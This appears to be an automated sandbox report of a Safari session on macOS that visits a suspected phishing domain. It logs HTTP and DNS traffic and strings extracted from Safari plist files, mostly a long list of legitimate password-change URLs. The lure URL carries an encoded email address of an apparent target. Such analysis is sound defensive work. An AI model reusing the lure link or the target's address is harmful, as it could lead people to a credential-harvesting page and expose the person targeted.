Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1Host: newscorp.wtranovations.comOrigin: https://newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /statsic/css/main.output.css HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: text/css,*/*;q=0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: */*Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: com.apple.Safari.SearchHelper/14606.3.4 CFNetwork/976 Darwin/18.2.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-regular-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: */*Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: com.apple.Safari.SearchHelper/14606.3.4 CFNetwork/976 Darwin/18.2.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$ HTTP/1.1Host: newscorp.wtranovations.comAccept: */*Accept-Language: en-gbConnection: keep-aliveAccept-Encoding: br, gzip, deflateUser-Agent: com.apple.Safari.SearchHelper/14606.3.4 CFNetwork/976 Darwin/18.2.0 (x86_64)
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: newscorp.wtranovations.comConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15Accept-Language: en-gbReferer: https://newscorp.wtranovations.com/Accept-Encoding: br, gzip, deflate
Source: AutoFillQuirks.plist.244.drString found in binary or memory: .https://www.facebook.com/settings?tab=security_ equals www.facebook.com (Facebook)
Source: AutoFillQuirks.plist.244.drString found in binary or memory: 2https://www.linkedin.com/psettings/change-password_ equals www.linkedin.com (Linkedin)
Source: TopSites.plist.244.drString found in binary or memory: https://www.facebook.com/XFacebook equals www.facebook.com (Facebook)
Source: TopSites.plist.244.drString found in binary or memory: https://www.linkedin.com/XLinkedIn equals www.linkedin.com (Linkedin)
Source: TopSites.plist.244.drString found in binary or memory: https://www.yahoo.com/UYahoo equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: newscorp.wtranovations.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdn4.iconfinder.com
Source: CloudHistoryRemoteConfiguration.plist.244.drString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: TopSites.plist.244.drString found in binary or memory: http://www.apple.com/uk/startpage/
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://247sports.com/my/settings/password/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.booking.com/account-recovery_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.churchofjesuschrist.org/changePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.deere.com/actmgmt/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.docusign.com/me/changepassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.forbes.com/profile_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.gmx.net/ciss/security/edit/passwordChange_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.id.hp.com/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.id.me/signin/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.idm.telekom.com/account-manager/password/index.xhtml_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.live.com/password/Change_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.magento.com/customer/account/changepassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.proton.me/u/0/vpn/account-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.samsung.com/membership/contents/security/password/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://account.shodan.io/change_password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.adafruit.com/settings/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.autodesk.com/Profile/Security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.craigslist.org/pass_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.crowdin.com/password/change_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.dmm.co.jp/settings/change/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.ebay.com/acctsec/security-center/chngpwd_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.intuit.com/app/account-manager/security/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.nintendo.com/password/edit_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.panic.com/password_set_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.pch.com/forgotpass_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.secondlife.com/change_password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://accounts.shopify.com/accounts/186490458/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://acesso.gov.br/area-cidadao/#/alterarSenha_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://adultfriendfinder.com/p/update.cgi?p=my_account_update_account_password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://allegro.pl/moje-allegro/moje-konto/logowanie-i-haslo_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.acorns.com/settings/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.carta.com/profiles/update/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.constantcontact.com/pages/myaccount/settings/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.getflywheel.com/profile/security/change_password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.parkmobile.io/account/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.plex.tv/desktop#
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.prolific.co/account/general_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.sipgatebasic.de/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.stonly.com/app/general/userSettings/Account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://app.zeplin.io/profile/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://appleid.apple.com/account/manage_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://apps.anatel.gov.br/AnatelConsumidor/ConsumidorEditar.aspx_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://apps.jw.org/E_PASSCHG1_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://archive.org/account/index.php?settings=1_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://arxiv.org/user/change_own_password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.astonmartinf1.com/Dashboard/ChangePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.danawa.com/modifyMember_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.fandom.com/auth/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.opera.com/account/edit-profile_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.readymag.com/password/forgot_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.redgifs.com/lo/reset?ticket=_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://auth.usnews.com/changePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://b2c.voegol.com.br/minhas-viagens/meu-perfil_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://bandcamp.com/settings#password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://benefitslogin.discoverybenefits.com/Profile/UpdatePassword.aspx_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://blackwells.co.uk/bookshop/account/personal-details_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://blend.io/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://bugzilla.kernel.org/userprefs.cgi?tab=account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://cam.ana.co.jp/psz/us/amc_us.jsp?index=105_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://campus.tum.de_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://card.discover.com/cardmembersvcs/personalprofile/pp/UpdateDetails?ICMPGN=MYPROFILE_USERID_PA
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://censys.io/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://cfspart.impots.gouv.fr/monprofil-webapp/GererMonProfil_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://chaturbate.com/auth/password_change/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://classroom.udacity.com/settings/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://cloud.digitalocean.com/settings/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://cloud.linode.com/profile/auth_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://codepen.io/settings/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://consumercenter.mysynchrony.com/consumercenter/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://customer.safeco.com/accountmanager/profile/changepassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://customer.xfinity.com/users/me/update-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://customercenter.marketwatch.com/account#password?mod=ql_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://customercenter.wsj.com/account#password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dan.com/users/settings/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dash.cloudflare.com/profile/authentication_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dash.e.jimdo.com/profile_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dashboard.branch.io/account-settings/user_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dashboard.dittomusic.com/account/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dashboard.heroku.com/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://dashboard.messagebird.com/account/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://discord.com/settings/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://duolingo.com/settings/profile_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://elpais.com/subscriptions/#/profile_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://employeewe.bamboohr.com/dashboard/password.php_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://experience.gm.com/myaccount/security/passwordChange_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://fetlife.com/settings/account/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://flightaware.com/account/manage_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://forum.wii-homebrew.com/index.php/AccountManagement/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://foursquare.com/change_password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://fps.fidelity.com/ftgw/Fps/Fidelity/RtlCust/ChangePIN/Init_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://genius.com/password_resets/new_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://github.com/settings/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://go.com/profile/account-settings/edit_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://help.steampowered.com/en/wizard/HelpChangePassword?redir=store/account/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://help.steampowered.com/en/wizard/HelpWithLoginInfoReset/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://hibrain.net/mybrain/users/password/edit_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://home.thesun.co.uk/edit/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://honeywell.csod.com/resetPasswrd.aspx?_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://hotels.com/profile/settings.html_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://hq1.appsflyer.com/account/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://id.atlassian.com/manage-profile/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://id.nfl.com/account/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://id.sonyentertainmentnetwork.com/id/management/#/p/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://identity.surveymonkey.com/us/manage?locale=en_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://identity.xero.com/account/?AccountUrl=/
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://imgur.com/account/settings/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://key.harvard.edu/manage-account/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://kundenportal.edeka-smart.de/edeka-csc/forgot-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://l.doctoralia.com.br/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://leetcode.com/accounts/password/set/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://legacy.memoriams.com/Network/Account/ChangePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://letterboxd.com/settings/auth/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://linktr.ee/admin/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.aliexpress.com/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.aol.com/account/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.blockchain.com/en/#/security-center/advanced_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.coupang.com/login/userModify.pang_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.teamviewer.com/nav/profile/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.thesun.co.uk/user/changePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.ti.com/ext/pwdchange/Identify_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.tmon.co.kr/user/info_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.usatoday.com/USAT-GUP/password-forgot/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.yahoo.com/account/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.yahoo.com/myaccount/security/change-password/?src=finance_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://login.yahoo.com/myaccount/security/change-password/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://logonservices.iam.target.com/change-password/?target=#
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://logowanie.pl.canalplus.com/zmien-haslo_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://mastercard.syf.com/login/reset_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://mathworks.com/mwaccount/profiles/password/change_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://member.daum.net/change/password.daum_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://member.webmd.com/password-reset_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://membership.latimes.com/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://memberssl.auction.co.kr/membership/MyInfo/MyInfo.aspx_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://meuvivo.vivo.com.br/meuvivo/appmanager/portal/fixo_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://minhanet.net.com.br/webcenter/portal/MinhaNet/pages_alterarsenha_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://moncompte.lemonde.fr/gcustomer/account/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.foxbusiness.com/?p=account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.foxnews.com/?pieces=reset_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.goabode.com/#/app/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.nextdns.io/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.norton.com/extspa/account/personalinfo_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.okta.com/signin/password-reset_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://my.state.nj.us/edituser/EditUserProfile_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myaccount.ea.com/cp-ui/security/index_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myaccount.google.com/signinoptions/password?continue=https://myaccount.google.com/security_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myaccount.google.com/signinoptions/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myaccount.uscis.gov/users/registration/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myaccount.virginmobile.ca/MyProfile/Details/EditProfile?editField=PASSWORD_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myaccounts.capitalone.com/Security/changePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://mychart.clevelandclinic.org/inside.asp?mode=passwd_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://mypassword.uml.edu/#Change_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://mypay.dfas.mil/#/settings/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myspace.com/settings/profile/email_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://myvpostpay.verizon.com/ui/bill/secure/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://na224.lightning.force.com/lightning/settings/personal/ChangePassword/home_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://nbcuniversal.nbc.com/request-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://news.ycombinator.com/changepw_
Source: LastSession.plist0.244.dr, LastSession.plist.244.drString found in binary or memory: https://newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://nhentai.net/reset/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://nid.naver.com/user2/help/myInfo.nhn?m=viewChangePasswd_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://njal.la/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://nypost.com/account/settings_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://online.citi.com/US/ag/profile-update/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://onlyfans.com/my/settings/account/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://orcid.org/account_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://password.umsystem.edu/reset/_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://play.hbomax.com/setting/account/edit/password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://portal.edd.ca.gov/WebApp/Profile/UpdatePassword_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://portal.pilotflyingj.com/myrewards/forgot-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://portalpersonas.bancochile.cl/mibancochile-web/front/persona/index.html#/mi-perfil/datos-segu
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://portlandgeneral.com/secure/profile/change-password_
Source: AutoFillQuirks.plist.244.drString found in binary or memory: https://poshmark.com/user/account-info_
